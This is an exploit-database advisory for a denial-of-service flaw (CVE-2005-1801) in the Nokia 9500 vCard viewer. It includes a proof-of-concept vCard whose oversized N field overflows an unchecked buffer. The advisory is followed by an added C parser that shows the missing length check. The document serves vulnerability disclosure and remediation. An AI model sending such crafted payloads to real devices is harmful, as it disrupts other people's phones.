
Nokia 9500 - vCard Viewer Remote Denial of Service

Author: Marek Bialoglowy
type: dos
platform: hardware
date_added: 2005-05-26 
date_updated: 2013-05-27 
verified: 1 
codes: CVE-2005-1801;OSVDB-17033 

source: https://www.securityfocus.com/bid/13784/info

The vCard viewer on the Nokia 9500 handset is affected by a remote denial-of-service vulnerability.

The issue occurs when the device handles a malformed vCard and fails to perform boundary checks before copying user-supplied data into a finite-sized buffer.

Successful exploitation requires user interaction: the user is asked to accept the vCard and must then open it manually.

The following proof of concept vCard is available:
--- Nokia9500.vcf ---
BEGIN:VCARD
VERSION:2.1
N:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;BIALOGLOWY
FN:Marek Bialoglowy
ORG:INDEPENDENT
TITLE:COO
TEL;WORK;VOICE:+6221
TEL;WORK;FAX;
ADR;WORK;ENCODING=QUOTED-PRINTABLE:;;Indonesia
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:Indonesia
URL;WORK;
EMAIL;PREF;INTERNET:bialoglowy@gmail.com
REV:20050430T1958490
END:VCARD
--- Nokia9500.vcf ---
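
Added example (not part of the original advisory and not Nokia's code): a C parser for the N property that performs the length check before the copy, which is the boundary check the advisory says is missing. NAME_FIELD_MAX, struct vcard_name, copy_component and parse_n_property are hypothetical names, and the 64-byte limit is an assumed value because the advisory does not state the real buffer size.

```c
#include <stdio.h>
#include <string.h>

#define NAME_FIELD_MAX 64  /* assumed limit; the advisory gives no buffer size */

struct vcard_name {        /* hypothetical parsed form of the N property */
    char family[NAME_FIELD_MAX];
    char given[NAME_FIELD_MAX];
};
enum { VC_OK = 0, VC_NOT_N = -1, VC_TOO_LONG = -2 };

/* Copy one component only if it fits with its terminator; never truncate. */
static int copy_component(const char *src, size_t len, char *dst, size_t dstsz)
{
    if (len >= dstsz)
        return VC_TOO_LONG;            /* length is checked before any copy */
    memcpy(dst, src, len);
    dst[len] = '\0';
    return VC_OK;
}

/* Parse one unfolded "N[;params]:Family;Given[;...]" line into fixed fields. */
int parse_n_property(const char *line, struct vcard_name *out)
{
    struct vcard_name tmp = { "", "" };
    const char *val;
    size_t n;
    int rc;

    if (line[0] != 'N' || (line[1] != ':' && line[1] != ';') ||
        (val = strchr(line, ':')) == NULL)
        return VC_NOT_N;
    val++;
    n = strcspn(val, ";\r\n");         /* family name ends at ';' or line end */
    if ((rc = copy_component(val, n, tmp.family, sizeof tmp.family)) != VC_OK)
        return rc;
    if (val[n] == ';') {               /* optional given-name component */
        val += n + 1;
        n = strcspn(val, ";\r\n");
        if ((rc = copy_component(val, n, tmp.given, sizeof tmp.given)) != VC_OK)
            return rc;
    }
    *out = tmp;                        /* commit only after every check passed */
    return VC_OK;
}

int main(void)
{
    struct vcard_name n = { "", "" };
    int rc = parse_n_property("N:Bialoglowy;Marek", &n);  /* constructed input */
    printf("rc=%d family=%s given=%s\n", rc, n.family, n.given);
    return 0;
}
```

An overlong component is rejected as a whole record rather than truncated, so the caller's structure is left unchanged on error.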